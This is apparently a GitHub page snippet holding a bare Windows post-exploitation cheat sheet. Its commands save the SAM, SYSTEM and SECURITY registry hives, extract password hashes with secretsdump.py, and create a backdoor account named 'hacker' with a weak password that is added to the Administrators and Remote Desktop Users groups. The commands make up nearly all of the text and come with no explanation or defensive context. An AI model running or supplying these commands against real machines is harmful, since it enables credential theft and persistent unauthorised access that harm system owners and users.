You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
secretsdump.py -sam sam -system system -security security LOCAL > hashes.txt
Add RDP user
net user hacker hacker123 /add
net localgroup Administrators hacker /add
net localgroup "Remote Desktop Users" hacker /ADD